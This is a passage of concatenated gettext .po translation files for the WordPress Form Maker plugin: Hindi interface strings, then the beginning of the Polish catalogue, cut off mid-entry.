#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "मई"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "जून "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "जुलाई "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "अगस्त"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "सितंबर "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "अक्टूबर "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "नवंबर "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "दिसंबर  "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "त्रुटि, गलत सुरक्षा कोड."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "आपका आईपी काली सूची में डाला है. वेबसाइट व्यवस्थापक से संपर्क करें. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "फ़ाइल का आकार की अनुमति दी से अधिक"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "क्षमा करें, आप इस प्रकार की फ़ाइल अपलोड करने की अनुमति नहीं है."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "त्रुटि, फ़ाइल स्थानांतरित नहीं किया जा सकता है."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid "This field %s requires a unique entry and this value was already submitted."
msgstr "इस क्षेत्र %s एक अद्वितीय प्रविष्टि की आवश्यकता है और इस मूल्य पहले से ही प्रस्तुत किया गया."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "त्रुटि, ईमेल नहीं भेजा गया था."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "कुछ भी नहीं प्रस्तुत किया गया था."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "अपने प्रपत्र सफलतापूर्वक सबमिट किया गया था."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "त्रुटि, ईमेल नहीं भेजा गया था."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "आपका ईमेल पता पहले से ही सत्यापित है।"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "आपका ईमेल सफलतापूर्वक सत्यापित किया गया है।"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "आपका ईमेल सत्यापन का समय समाप्त हो गया है।"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "सत्यापन लिंक अमान्य है।"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "फ़ील्ड की आवश्यकता है."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "यह एक मान्य ईमेल पता नहीं है."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid "You cannot select former dates. Choose a date starting from the current one."
msgstr "आप पूर्व तारीखों का चयन नहीं कर सकते हैं। वर्तमान एक से शुरू करने के लिए एक तिथि चुनें।"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "मूल्य के बीच होना चाहिए "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "मात्रा "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "अपने स्कोर की तुलना में कम होना चाहिए "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "शीर्षक "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "प्रथम || प्रारंभिक"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "अंतिम "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "मध्य"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "एरिया कोड"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "फ़ोन नंबर"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "डॉलर "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "सेंट्स "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "से "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "तक"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "जाओ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "रीसेट "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "submissions are not shown, as the field you sorted by is missing in those submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "एक क्षेत्र का चयन करें "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "एक तिथि का चयन करें"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-pl_PL.po000060400000057215152434416630012216 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:02+0400\n"
"PO-Revision-Date: 2015-05-22 17:02+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: pl\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Ulica"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Linia Ulica 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Miejscowość"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stan / województwo / region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Kraj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Styczeń"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Luty"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marzec"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Kwiecień"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Czerwiec"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Lipiec"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Sierpień"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Wrzesień"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Październik"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Listopad"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Grudzień"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Podano niepoprawny kod bezpieczeństwa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Twoje IP jest na czarnej liście. Proszę skontaktować się z administratorem "
"strony"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Plik przekracza dopuszczalny rozmiar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Przepraszamy, nie możesz wgrać tego typu pliku."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
